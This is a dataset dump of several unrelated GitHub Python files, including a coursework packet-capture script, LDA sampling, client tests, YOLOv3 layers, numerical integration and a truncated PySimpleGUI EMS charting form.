especificado interfaz ni fichero')\r\n\t\tparser.print_help()\r\n\t\tsys.exit(-1)\r\n\r\n\r\n\terrbuf = bytearray()\r\n\thandle = None\r\n\tpdumper = None\r\n\tcapture_name = \"captura.\"\r\n\t\r\n\r\n\tif args.interface:\r\n\t\thandle = pcap_open_live(args.interface, ETH_FRAME_MAX,1,100,errbuf)\r\n\t\tcapture_name = capture_name + args.interface + \".\" + str(int(time.time())) + \".pcap\"\r\n\t\tflag = 1\r\n\t\tfile_descripter=pcap_open_dead(DLT_EN10MB, ETH_FRAME_MAX) \t\r\n\t\tpdumper = pcap_dump_open(file_descripter, capture_name)\r\n\r\n\r\n\tif args.tracefile:\r\n\t\tcapture_name = capture_name+args.tracefile\r\n\t\thandle = pcap_open_offline(args.tracefile, errbuf)\r\n\r\n\r\n\tret = pcap_loop(handle, -1, procesa_paquete, None)\r\n\tif ret == -1:\r\n\t\tlogging.error('Error al capturar un paquete')\r\n\telif ret == -2:\r\n\t\tlogging.debug('pcap_breakloop() llamado')\r\n\telif ret == 0:\r\n\t\tlogging.debug('No mas paquetes o limite superado')\r\n\r\n\tlogging.info('{} paquetes procesados'.format(num_paquete))\r\n\tpcap_close(handle)\r\n\r\n\tif flag ==1 :\r\n\t\tpcap_close(file_descripter)\r\n\t\tpcap_dump_close(pdumper)\r\n\r\n\t\r\n\r\n","repo_name":"albaramosp/informaticaUAM","sub_path":"3/REDES_I/P1/practica1.py","file_name":"practica1.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"es","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"2793793841","text":"\"\"\"\nrunclassic400.py\n\nRun script to perform LDA sampling on Classic 400 data.\n\"\"\"\n\nimport sys\nimport numpy as np\nimport scipy.io\nimport gibbs\n\n# First, load in the data\ndatadict = scipy.io.loadmat('data/classic400.mat')\n\n# Extract count data from dict, split into lists\nclassic400data = datadict['classic400']\ndoc_idx, voc_idx = classic400data.nonzero() # load doc, vocab indices\ncounts = classic400data.data # load counts\n\nK = 3 # cardinality of topic space\nM = 400 # number of documents\nV = 6205 # size of the vocabulary\nS = len(counts) # number of nonzero elements in corpus\n\n# Now randomly initialize q,n based on data\nq = np.zeros(shape=(S,K), dtype='int')\nn = np.zeros(shape=(M,K), dtype='int')\n\nfor bi,(m,count) in enumerate(zip(doc_idx,counts)):\n # To randomly assign topics, draw (K-1) ints from the uniform distribution \n # over the interval [0,count). 
The length of each sub-interval is the topic\n    # count assigned to that element of the matrix (note that this\n    # automatically includes the possibility of zero counts).\n    draws = np.sort(np.append(np.array([0]),np.random.randint(0, count, K-1)))\n    subints = np.array([draws[i+1] - draws[i] for i in range(len(draws)-1)])\n    subints = np.append(subints, np.array(count-draws[-1]))\n    np.random.shuffle(subints)\n    for zi,subint in enumerate(subints):\n        q[bi,zi] += subint\n        n[m,zi] += subint\n\n# initialize alpha, beta\n#afv = [1.0, 1.0, 1.0]\n#bfv = [10000.0, 1000.0, 100.0]\n#qfnamev = ['data/c400_q_a0p1_b10000p0_K3.dat',\n#           'data/c400_q_a1p0_b1000p0_K3.dat',\n#           'data/c400_q_a10p0_b100p0_K3.dat']\n#nfnamev = ['data/c400_n_a0p1_b10000p0_K3.dat',\n#           'data/c400_n_a1p0_b1000p0_K3.dat',\n#           'data/c400_n_a10p0_b100p0_K3.dat']\n\na = float(sys.argv[1]) # prefactors on alpha,beta\nb = float(sys.argv[2])\naf = sys.argv[3] # for filenames\nbf = sys.argv[4]\nqfname = 'data/c400_q_a'+af+'_b'+bf+'_K3.dat'\nnfname = 'data/c400_n_a'+af+'_b'+bf+'_K3.dat'\n\nalpha = a*np.ones(K)\nbeta = b*np.ones(V)\n\n# now run 500 epochs\nfor nep in range(500):\n    q,n = gibbs.gibbs_epoch(q,n,alpha,beta,doc_idx,voc_idx)\n\n# save the results to file\nnp.savetxt(qfname,np.array(q),fmt='%d')\nnp.savetxt(nfname,np.array(n),fmt='%d')\n","repo_name":"paulrozdeba/CS250B","sub_path":"hw3/runclassic400.py","file_name":"runclassic400.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"21449223600","text":"# -*- coding: utf-8 -*-\n\nimport gevent\nfrom pytest import fixture\n\nfrom huskar_sdk_v2.bootstrap.client import BaseClient\nfrom huskar_sdk_v2.utils import combine\n\n\n@fixture\ndef test_key():\n    return 'test_key'\n\n\n@fixture\ndef test_full_path(base_path, test_key):\n    return combine(base_path, test_key)\n\n\n@fixture\ndef huskar_client(request, servers, base_path):\n    c = BaseClient(servers, '', '', base_path)\n    request.addfinalizer(c.stop)\n    c.start()\n    return c\n\n\ndef test_start_stop(servers, test_key, base_path):\n    c = BaseClient(servers, '', '', base_path)\n    assert not c.connected\n    c.start()\n    gevent.sleep(1)\n    assert c.connected\n    c.stop()\n    assert not c.connected\n    c.lazy = False\n    # will not raise\n    c.create(test_key, '1')\n\n    c = BaseClient(servers, '', '', base_path, local_mode=True)\n    c.create(test_key, '1')\n\n\ndef test_lazy(servers, test_key, base_path):\n    c = BaseClient(servers, '', '', base_path, lazy=True)\n    assert not c.connected\n    c.exists(test_key)\n    assert c.connected\n    c.stop()\n    assert not c.connected\n    c.exists(test_key)\n    assert c.connected\n\n    c.lazy = False\n    c.stop()\n    assert not c.connected\n    assert not c.exists(test_key)\n    c.start()\n    # will not raise\n    c.exists(test_key)\n\n\ndef test_create_delete(huskar_client, test_key, base_path):\n    huskar_client.ensure_path(base_path)\n\n    huskar_client.create(test_key, '1')\n    assert huskar_client.exists(test_key)\n    huskar_client.delete(test_key)\n    assert not huskar_client.exists(test_key)\n\n\ndef test_set_get(huskar_client, test_key, base_path):\n    huskar_client.ensure_path(base_path)\n\n    data = 'somedata'\n    huskar_client.create(test_key, '1', ephemeral=True)\n    huskar_client.set_data(test_key, data)\n    value, state = huskar_client.get(test_key)\n    assert value == data\n\n\ndef test_exception(huskar_client):\n    assert not huskar_client.watch_key('nonesense')\n\n\ndef test_watch_key(huskar_client, test_key, test_full_path):\n    
huskar_client.client.create(test_full_path, b'1', makepath=True)\n huskar_client.watch_key(test_key)\n\n def handler(*args):\n handler.called = True\n handler.called = False\n\n huskar_client.watched_blinker.signal(test_key).connect(handler)\n huskar_client.client.set(test_full_path, b'changed')\n gevent.sleep(1)\n assert handler.called\n\n handler.called = False\n huskar_client.client.delete(test_full_path)\n gevent.sleep(1)\n assert handler.called\n\n handler.called = False\n huskar_client.client.create(test_full_path, b'1', makepath=True)\n # the signal should be disconnected after this\n huskar_client.stop()\n huskar_client.start()\n huskar_client.client.set(test_full_path, b'changed again')\n gevent.sleep(1)\n huskar_client.client.delete(test_full_path)\n assert not handler.called\n\n\ndef test_watch_path(huskar_client, test_key, test_full_path):\n\n def handler(children):\n handler.children = children\n\n huskar_client.client.create(test_full_path, b'', makepath=True)\n huskar_client.watch_path(test_key, handler)\n\n handler.children = None\n huskar_client.client.create(test_full_path + '/foo', b'', makepath=True)\n gevent.sleep(0.5)\n assert handler.children == ['foo']\n\n handler.children = None\n huskar_client.client.delete(test_full_path + '/foo')\n gevent.sleep(0.5)\n assert handler.children == []\n\n handler.children = None\n huskar_client.client.delete(test_full_path)\n gevent.sleep(0.5)\n assert handler.children is None\n data_watch, children_watch = huskar_client.watched_path[test_key]\n assert not data_watch._stopped\n assert children_watch._stopped\n\n handler.children = None\n huskar_client.client.create(test_full_path + '/bar', b'', makepath=True)\n gevent.sleep(0.5)\n assert handler.children == ['bar']\n assert not data_watch._stopped\n assert not children_watch._stopped\n","repo_name":"huskar-org/huskar-python","sub_path":"tests/test_kazoo_client/test_kazoo_baseclient.py","file_name":"test_kazoo_baseclient.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"71377743368","text":"from library.utils import format_object, logging_indent, ObjectWrapper, extract_wrapped\n\n\nclass OptimizerWrapper(ObjectWrapper):\n\n '''Just for late printing'''\n\n def __init__(self, optimizer, wrapper_info=(), **params):\n super().__init__(optimizer)\n self._params = params\n self._wrapper_info = wrapper_info\n\n def summary(self):\n optimizer = extract_wrapped(self._body, attr_name='optimizer')\n with logging_indent(f\"Optimizer: {format_object(optimizer, **self._params)}\"):\n for wrapper in self._wrapper_info:\n print(wrapper)\n","repo_name":"MiuLab/TaylorGAN","sub_path":"src/core/train/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"16"} +{"seq_id":"5787328060","text":"import numpy as np\nfrom scipy.sparse import diags\nfrom scipy.interpolate import interp1d\n\n## This function finds the indices of the array where an event starts and end given a threshold\ndef flatten(x,y,limit):\n \"\"\"Return the indices of x where the variation in y is greater than limit.\"\"\"\n k = np.ones_like(y)\n dx = np.concatenate([np.diff(x),[x[-2]-x[-1]]])\n Dx = diags([-k,k],[0,1]).todense()\n dy = Dx.dot(y.T)/dx\n dy[0,-1] = dy[0,-2]\n dy = np.asarray(dy)[0]\n \n dy = np.nan_to_num(dy)\n\n for i in range(len(dy)-1):\n if dy[i+1] == 0.:\n if dy[i] < 0.:\n dy[i+1] += -10e-9\n if 
dy[i] > 0.:\n dy[i+1] += 10e-9\n\n # extremas\n ind = [0]\n for i in range(len(dy)-1):\n if dy[i]*dy[i+1] <= 0:\n ind.append(i+1)\n ind.append(len(dy)-1)\n \n\n dmag = []\n \n\n for i in range(len(ind)-1):\n i0 = ind[i]\n i1 = ind[i+1]\n dm = y[i1]-y[i0]\n dmag.append(dm)\n \n dmag_matrix = np.zeros((len(ind),len(ind)))\n \n \n \n ind_up = []\n ind_dn = []\n\n dni_up = []\n dni_dn = []\n \n dmag_up = []\n dmag_dn = []\n \n \n \n for i in range(len(ind)):\n for j in range(len(ind)):\n if np.abs(y[ind[j]] - y[ind[i]]) > limit and i < j:\n #if i < j:\n dmag_matrix[i,j] = y[ind[j]] - y[ind[i]]\n\n\n aux1 = True\n aux2 = True\n \n mask = np.zeros(dmag_matrix.shape[0])\n i1,j1 = 0,1\n while aux2:\n if np.all(dmag_matrix[:,j1] == mask):\n if j1+1 >= dmag_matrix.shape[1]:\n return ind_up,ind_dn,dni_up,dni_dn,dmag_up,dmag_dn\n j1 += 1\n continue\n if not np.all(dmag_matrix[:,j1] == mask):\n i1 = np.argmax(np.abs(dmag_matrix[:,j1]))\n j2 = j1+1\n i2 = j2-1\n break\n \n while aux1:\n if i1+1 == dmag_matrix.shape[0] or j1+1 == dmag_matrix.shape[1]:\n if dmag_matrix[i1,j1] > 0:\n ind_up.append(ind[i1])\n dni_up.append(ind[j1])\n dmag_up.append(dmag_matrix[i1,j1])\n if dmag_matrix[i1,j1] < 0:\n ind_dn.append(ind[i1])\n dni_dn.append(ind[j1])\n dmag_dn.append(dmag_matrix[i1,j1])\n break\n if dmag_matrix[i2,j2] == 0:\n j1 = np.where(np.max(np.abs([dmag_matrix[i1,j1],dmag_matrix[i1,j2]])) == np.abs(dmag_matrix[i1,:]))[0]\n while True:\n if type(j1) == np.int64 or type(j1) == int:\n break\n j1 = j1[0]\n if j2+1 == dmag_matrix.shape[1]:\n #stop and save\n if dmag_matrix[i1,j1] > 0:\n ind_up.append(ind[i1])\n dni_up.append(ind[j1])\n dmag_up.append(dmag_matrix[i1,j1])\n break\n if dmag_matrix[i1,j1] < 0:\n ind_dn.append(ind[i1])\n dni_dn.append(ind[j1])\n dmag_dn.append(dmag_matrix[i1,j1])\n break\n i2 = j2 - np.abs(j2-j1)\n j2 += 1\n continue\n if dmag_matrix[i1,j1] * dmag_matrix[i2,j2] < 0:\n if dmag_matrix[i1,j1] > 0:\n ind_up.append(ind[i1])\n dni_up.append(ind[j1])\n dmag_up.append(dmag_matrix[i1,j1])\n i1 = i2\n j1 = j2\n j2 = j1 + 1\n i2 = j2 - np.abs(j2-j1)\n continue\n if dmag_matrix[i1,j1] < 0:\n ind_dn.append(ind[i1])\n dni_dn.append(ind[j1])\n dmag_dn.append(dmag_matrix[i1,j1])\n i1 = i2\n j1 = j2\n j2 = j1 + 1\n i2 = j2 - np.abs(j2-j1)\n continue\n if dmag_matrix[i1,j1] * dmag_matrix[i2,j2] > 0:\n j1 = j2\n j2 += 1\n i2 = j2 - 1\n continue\n \n ## ind denotes starting point of event\n ## dni denotes ending point of event\n ## up means it was an increase in magnitude (demagnification)\n ## dn means it was an decrease in magnitude (magnification)\n ## dmag is the variation of the magnitude of the event\n return ind_up, ind_dn, dni_up, dni_dn, dmag_up, dmag_dn\n\n## Interpolate to get the x value where 90% of the variation on the y axis respect to the \"peak\" occurs\ndef events_90(x, y, limit, mag_corr=0.1):\n up_start, dn_start, up_end, dn_end, up_dmag, dn_dmag = flatten(x, y, limit)\n x_starts = []\n x_ends = []\n y_starts = []\n y_ends = []\n flag = []\n ## For the \"up\" events the ending point is modified\n for i in range(len(up_start)):\n f = interp1d(y[up_start[i]:up_end[i]+1], x[up_start[i]:up_end[i]+1], kind='zero')\n x_starts.append(x[up_start[i]])\n x_ends.append(f(y[up_end[i]] - mag_corr))\n y_starts.append(y[up_start[i]])\n y_ends.append(y[up_end[i]] - mag_corr)\n flag.append(\"demag\")\n ## For the \"dn\" events the starting point is modified\n for i in range(len(dn_start)):\n f = interp1d(y[dn_start[i]:dn_end[i]+1], x[dn_start[i]:dn_end[i]+1], kind='zero')\n 
x_starts.append(f(y[dn_start[i]] - mag_corr))\n x_ends.append(x[dn_end[i]])\n y_starts.append(y[dn_start[i]] - mag_corr)\n y_ends.append(y[dn_end[i]])\n flag.append(\"mag\")\n\n return x_starts, x_ends, y_starts, y_ends, flag\n\n## Interpolate to get the x value where 90% of the variation on the y axis respect to the \"peak\" occurs\ndef events_90_flux(x, y, limit, int_frac=0.9):\n up_start, dn_start, up_end, dn_end, up_dmag, dn_dmag = flatten(x, y, limit)\n x_starts = []\n x_ends = []\n y_starts = []\n y_ends = []\n flag = []\n \n y = 10**(-0.4*y)\n \n ## For the \"up\" events the ending point is modified\n for i in range(len(up_start)):\n f = interp1d(y[up_start[i]:up_end[i]+1], x[up_start[i]:up_end[i]+1], kind='zero')\n x_starts.append(x[up_start[i]])\n x_ends.append(f(y[up_start[i]] + int_frac * (y[up_end[i]]-y[up_start[i]])))\n y_starts.append(y[up_start[i]])\n y_ends.append(y[up_start[i]] + int_frac * (y[up_end[i]]-y[up_start[i]]))\n flag.append(\"demag\")\n ## For the \"dn\" events the starting point is modified\n for i in range(len(dn_start)):\n f = interp1d(y[dn_start[i]:dn_end[i]+1], x[dn_start[i]:dn_end[i]+1], kind='zero')\n x_starts.append(f(y[dn_end[i]] - int_frac * (y[dn_end[i]]-y[dn_start[i]])))\n x_ends.append(x[dn_end[i]])\n y_starts.append(y[dn_end[i]] - int_frac * (y[dn_end[i]]-y[dn_start[i]]))\n y_ends.append(y[dn_end[i]])\n flag.append(\"mag\")\n \n y_starts = -2.5*np.log10(y_starts)\n y_ends = -2.5*np.log10(y_ends)\n\n return x_starts, x_ends, y_starts, y_ends, flag\n\ndef cc_count(curve):\n aux = np.where(curve==1)[0]\n red_ind = []\n if len(aux) > 1:\n red_ind.append(aux[0])\n for i in range(len(aux)-1):\n if aux[i+1] - aux[i] == 1:\n continue\n if aux[i+1] - aux[i] > 1:\n red_ind.append(aux[i+1])\n return len(red_ind)","repo_name":"fcneirad/event_finder","sub_path":"aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":7259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37114691465","text":"# Create by Tony Che at 2020-01\n\n# DevicesCountInDomain.py\n# Feature description\n\nimport json\nfrom NetBrainIE import NetBrainIE, PrintMessage\nfrom NetBrainDB import NetBrainDB\nfrom Utils.NetBrainUtils import NetBrainUtils, CurrentMethodName, CreateGuid\n\nConfigFile = r'.\\conf\\DevicesCountInDomain31200.conf'\n\ndef DevicesCountInDomain(configFile=''):\n configFile = ConfigFile if configFile == '' else configFile\n config = NetBrainUtils.GetConfig(configFile)\n if len(config) == 0:\n PrintMessage('Failed to load the configuration file: ' + configFile, 'Error')\n return False\n\n try:\n ret = True\n app = NetBrainDB(config)\n if app.Login():\n dbDomain = app.GetDatabase(config['Domain Name'])\n subTypeNames = dbDomain.Device.distinct('subTypeName')\n for subTypeName in subTypeNames:\n deviceCountById = dbDomain.Device.count_documents({'subTypeName': subTypeName})\n print(''.join([str(subTypeName), \": \", str(deviceCountById)]))\n except Exception as e:\n PrintMessage('Exception raised: ' + str(e), 'Error')\n ret = False\n finally:\n app.Logout()\n return ret\n\n\nif __name__ == \"__main__\":\n DevicesCountInDomain()\n\n","repo_name":"duke5/NBPerfomance","sub_path":"NetBrain-master/DevicesCountInDomain.py","file_name":"DevicesCountInDomain.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33176550200","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef 
integrand(x, a):\n return 1/np.sqrt(a**4 - x**4)\n\n#/ !!This is a slice of code from University of Michigan, because the 'gaussxw' module\n# from the textbook isn't available\n\ndef gaussxw(N):\n\n # Initial approximation to roots of the Legendre polynomial\n a = np.linspace(3,4*N-1,N)/(4*N+2)\n x = np.cos(np.pi*a+1/(8*N*N*np.tan(a)))\n\n # Find roots using Newton's method\n epsilon = 1e-15\n delta = 1.0\n while delta>epsilon:\n p0 = np.ones(N,float)\n p1 = np.copy(x)\n for k in range(1,N):\n p0,p1 = p1,((2*k+1)*x*p1-k*p0)/(k+1)\n dp = (N+1)*(p0-x*p1)/(1-x*x)\n dx = p1/dp\n x -= dx\n delta = max(abs(dx))\n\n # Calculate the weights\n w = 2*(N+1)*(N+1)/(N*N*(1-x*x)*dp*dp)\n\n return x,w\n\n\ndef gaussian_quadrature(a):\n N = 20\n #Weights and points for the Gaussian Quadrature for the interval [-1, 1]\n x, w = gaussxw(N)\n\n #Rescale the points and weights for the interval [0, a]\n x_rescaled = 0.5 * (a - 0) * x + 0.5 * (a + 0)\n w_rescaled = w * 0.5 * (a - 0)\n\n integral_value = np.dot(w_rescaled, integrand(x_rescaled, a))\n\n return np.sqrt(8) * integral_value\n\n#starting from 0.01 to avoid division by zero\namplitudes = np.linspace(0.01, 2, 400)\nperiods = [gaussian_quadrature(a) for a in amplitudes]\n\nplt.plot(amplitudes, periods)\nplt.xlabel('Amplitude (a)')\nplt.ylabel('Period (T)')\nplt.title('Period vs. Amplitude for V(x) = x^4')\nplt.savefig('Period vs. Amplitude.png')\nplt.show()\n","repo_name":"saladsushi/phys-ua210","sub_path":"ps-4/ps-4-q2.py","file_name":"ps-4-q2.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33410187455","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('reddit_api', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='RedditImage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('url', models.URLField()),\n ('reputation', models.IntegerField()),\n ],\n ),\n migrations.AddField(\n model_name='reddit',\n name='image',\n field=models.ForeignKey(blank=True, to='reddit_api.RedditImage', null=True),\n ),\n ]\n","repo_name":"fhanspach/reddit-image-viewer","sub_path":"reddit_api/migrations/0002_auto_20151014_1653.py","file_name":"0002_auto_20151014_1653.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"12726659003","text":"import re\n#Expressoes regulares\nprint(\"-----------------------------------------------------\")\npadrao = \"[0-9][a-z]{2}[0-9]\"\ntexto = \"123 1ac2 1cc aa1\"\nresposta = re.search(padrao,texto)\nprint(resposta.group())\n\npadrao2 = \"\\w{5,50}@[a-z]{3,10}.com.br\"\ntexto2 = \"aaabbbcc wanda123@gmail.com.br ccbbbaaa2 vision3@gmail.com.br\"\nresposta2 = re.search(padrao2, texto2)\nresposta3 = re.findall(padrao2,texto2)\n\nprint(resposta2.group())\nprint(resposta3)","repo_name":"Renato9889/PythonBrasilValidacaoDeDadosPadraoNacional","sub_path":"expressoes_regulares.py","file_name":"expressoes_regulares.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"37425808694","text":"import tensorflow as tf\nimport parameter\nfrom tensorflow.contrib.layers import xavier_initializer\nfrom tensorflow.keras.initializers 
import he_normal, he_uniform\n\n\ndef fixed_padding(input_tensor, kernel_size, mode='CONSTANT'):\n\n \"\"\"\n pad the input_tensor along the spatial dimension to achieve the same performance of\n 'same' padding but independent of the input size\n\n :param input_tensor: A tensor of size [batch, height, width, channel] (NHWC)\n :param kernel_size: The size of the kernel filter or the pool_size. Should be an positive integer\n :param mode: padding mode, default 'CONSTANT' which means padding zero value\n :return: output: A tensor after padding\n '''\n \"\"\"\n \n pad_total = kernel_size - 1\n pad_beg = pad_total // 2\n pad_end = pad_total - pad_beg\n \n output = tf.pad(tensor=input_tensor, \n paddings=[[0,0], [pad_beg, pad_end], [pad_beg, pad_end], [0,0]], \n mode=mode)\n \n return output\n\n\ndef Conv2d(input_tensor, n_filter, kernel_size, strides, batch_norm=True, activation=True, use_bias=False):\n\n \"\"\"\n\n :param input_tensor: input tensor of size [batch, height, width, channels]\n :param n_filter: number of filter used in the conv layer\n :param kernel_size: size of the filter can be an integer or a tuple of 2 elements\n :param strides: strides of the conv operation, can be an integer of tuple of 2 elements\n :param batch_norm: whether to use batch_normalisation default:True\n :param activation: whether to use the leaky_relu activation default:True\n :param use_bias: whether add bias to the kernel default: False\n :return:\n \"\"\"\n\n stride = strides[0]\n k = kernel_size[0]\n \n if stride > 1:\n input_tensor = fixed_padding(input_tensor, k)\n \n x = tf.layers.conv2d(inputs=input_tensor,\n filters=n_filter,\n kernel_size=kernel_size,\n strides=strides,\n padding=('same' if stride == 1 else 'valid'),\n activation=None,\n use_bias=use_bias,\n kernel_initializer=xavier_initializer())\n \n if batch_norm == True:\n # if we use batch_norm layers, we don't use bias terms\n batch_norm_params = {\n 'momentum' : parameter._BATCH_NORM_DECAY,\n 'epsilon' : parameter._BATCH_NORM_EPSILON,\n 'scale' : True,\n 'fused' : None,\n 'trainable' : True\n }\n \n x = tf.layers.batch_normalization(inputs=x, **batch_norm_params)\n \n if activation == True:\n x = tf.nn.leaky_relu(features=x, alpha= parameter._LEAKY_RELU)\n \n return x\n\n\ndef upsampling(input_tensor, strides=2):\n \n # tf implementation, data_format:NHWC\n height, width = input_tensor.get_shape().as_list()[1:3]\n new_size = (height * strides, width * strides)\n x = tf.image.resize_nearest_neighbor(images=input_tensor, size=new_size)\n \n return x\n\n\ndef Residual_block(input_tensor, n_filter):\n \n x = Conv2d(input_tensor, n_filter, (1,1), (1,1))\n x = Conv2d(x, n_filter*2, (3,3), (1,1))\n x = x + input_tensor \n return x\n\n\ndef Stack_Residual_block(input_tensor, n_filter, n_Repeat):\n x = Residual_block(input_tensor, n_filter)\n \n for i in range(n_Repeat-1):\n x = Residual_block(x, n_filter)\n \n return x\n\n\ndef yolo_block(input_tensor, num_filter):\n\n \"\"\"\n yolo convolution layer followed by the darknet53\n\n :param input_tensor: A tensor fo size [batch, height, width, channels]\n :param num_filter: number of filter\n :return: route: a feature map used in the following conv layers\n x: detection feature map\n \"\"\"\n\n x = Conv2d(input_tensor=input_tensor,\n n_filter=num_filter, \n kernel_size=(1,1), \n strides=(1,1))\n \n x = Conv2d(input_tensor=x,\n n_filter=num_filter * 2, \n kernel_size=(3,3),\n strides=(1,1))\n \n x = Conv2d(input_tensor=x, \n n_filter=num_filter,\n kernel_size=(1,1),\n strides=(1,1))\n \n x = 
Conv2d(input_tensor=x,\n n_filter=num_filter * 2,\n kernel_size=(3,3),\n strides=(1,1))\n \n x = Conv2d(input_tensor=x,\n n_filter=num_filter, \n kernel_size=(1,1), \n strides=(1,1))\n \n route = x\n \n x = Conv2d(input_tensor=x,\n n_filter=num_filter * 2,\n kernel_size=(3,3), \n strides=(1,1))\n \n return route, x\n\n\ndef detection_layer(input_tensor, n_classes, anchors, img_size):\n\n \"\"\"\n\n :param input_tensor: A tensor of size [batch, height, width, channels] (NHWC).\n :param n_classes: number of predicted classes\n :param anchors: List of tuple consist of size of the anchors (height, width)\n :param img_size: Size of the original input image\n :param cal_loss: whether used to calculate the loss\n :return: predictions: A tensor of size [batch, N*N, n_anchor*(5 + n_classes))]\n (N:size of the feature map,\n n_anchor: number of the anchor used in this feature map\n n_classes: number of classes in this model)\n\n location values are in range [0,1] (the same to yolo format)\n :return: raw_prediction: A tensor of size [batch, grid_size, grid_size, n_anchors, 5+n_classes\n this tensor is the raw output of the neural net.\n \"\"\"\n n_anchors = len(anchors)\n\n # detection conv layers. No batch_norm and activation(linear)\n predictions = Conv2d(input_tensor=input_tensor,\n n_filter=(n_anchors * (5 + n_classes)),\n kernel_size=(1,1),\n strides=(1,1),\n activation=False,\n batch_norm=False,\n use_bias=True)\n\n # get size of the feature map (height, width)\n grid_size = predictions.get_shape().as_list()[1:3]\n\n # save raw output for loss calculation\n raw_predictions = predictions\n raw_predictions = tf.reshape(raw_predictions, [-1, grid_size[0], grid_size[1], n_anchors, 5+n_classes])\n\n # total number of grids\n dim = grid_size[0] * grid_size[1]\n\n # total attributes of the bounding box (x,y, height, width, confidence)\n bbox_attrs = 5 + n_classes\n\n predictions = tf.reshape(predictions, [-1, n_anchors*dim, bbox_attrs])\n\n stride = (img_size[0] // grid_size[0], img_size[1] // grid_size[1])\n\n box_centers, box_sizes, confidence, classes = tf.split(value=predictions,\n num_or_size_splits=[2,2,1,n_classes],\n axis=-1)\n\n # apply sigmoid on x, y, confidence and classes(multiple label detection)\n box_centers = tf.nn.sigmoid(box_centers)\n confidence = tf.nn.sigmoid(confidence)\n classes = tf.nn.sigmoid(classes)\n\n # construct a offset grid for the feature map\n grid_x = tf.range(grid_size[0], dtype=tf.float32)\n grid_y = tf.range(grid_size[1], dtype=tf.float32)\n\n a, b = tf.meshgrid(grid_x, grid_y)\n\n x_offset = tf.reshape(a, (-1,1))\n y_offset = tf.reshape(b, (-1,1))\n\n x_y_offset = tf.concat([x_offset, y_offset], axis=-1)\n x_y_offset = tf.reshape(tf.tile(x_y_offset, [1, n_anchors]), [1, -1, 2])\n\n # output exact position of the centre\n box_centers = box_centers + x_y_offset\n box_centers = box_centers * stride\n\n # output exact size of the object\n anchors = tf.tile(anchors, [dim, 1])\n box_sizes = tf.exp(box_sizes) * anchors\n\n # normalize the location value in range [0,1]\n box_centers /= img_size\n box_sizes /= img_size\n\n predictions = tf.concat([box_centers, box_sizes, confidence, classes], axis=-1)\n\n grid = tf.reshape(x_y_offset, [-1, grid_size[0], grid_size[1], n_anchors, 2])\n box_xy = tf.reshape(box_centers, [-1, grid_size[0], grid_size[1], n_anchors, 2])\n box_wh = tf.reshape(box_sizes, [-1, grid_size[0], grid_size[1], n_anchors, 2])\n\n raw_data = (grid, raw_predictions, box_xy, box_wh)\n\n return predictions, 
raw_data\n","repo_name":"Zonghan666/Msc_Project","sub_path":"Yolov3/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":8328,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"9515372164","text":"def eprimo(n):\r\n \r\n menores_primos = [2,3,5,7] # criterio 1: estar nessa lista\r\n if n in menores_primos:\r\n return True\r\n else:\r\n for i in menores_primos: # criterio 2: ser multiplo dos menores primos\r\n nprimo = n % i\r\n if nprimo == 0:\r\n return False\r\n \r\n \r\n for divisor in range(2,n-1): # criterio 3: ter o resto diferente de 0 e quociente menor que o divisor\r\n resto = n % divisor\r\n quociente = n / divisor\r\n \r\n if (resto == 0):\r\n return False\r\n else:\r\n if (quociente < divisor):\r\n return True\r\n\r\n\r\ndef n_primos():\r\n numero = int(input(\"Digite um numero maior ou igual a 2: \"))\r\n\r\n quantidade = 0\r\n\r\n for i in range(2,numero):\r\n if eprimo(i) == True:\r\n quantidade += 1\r\n\r\n return quantidade\r\n","repo_name":"beelnunes/PraticandoPython","sub_path":"opcional.py","file_name":"opcional.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12911020843","text":"import PySimpleGUI as sg\nfrom EasyChart import Narrative\nsg.theme('DarkTeal9')\n\n# Main screen layout\nlayout1 = [\n [sg.Text('Type of chart: ', size=(15, 1))],\n [sg.Button(\"Transport\"), sg.Button(\"Refusal\"), sg.Button(\"911 Triage\"), sg.Button(\"911\")]\n]\n\n# Transport window layout\nlayoutTransport = [\n [sg.Text('Unit: ', size=(15,1)), sg.Push(), sg.InputText(key='unit')],\n [sg.Text('Dispatcher: ', size=(15,1)), sg.Push(), sg.InputText(key='dispatcher')],\n [sg.Text('From: ', size=(15,1)), sg.Push(), sg.InputText(key='origin')],\n [sg.Text('To: ', size=(15,1)), sg.Push(), sg.InputText(key='destination')],\n [sg.Text('Age: ', size=(15,1)), sg.Push(), sg.InputText(key='age')],\n [sg.Text('Sex: ', size=(15,1)), sg.Push(), sg.InputText(key='sex')],\n [sg.Text('Found position: ', size=(15,1)), sg.Push(), sg.InputText(key='pos')],\n [sg.Text('HPI: ', size=(15,1)), sg.Push(), 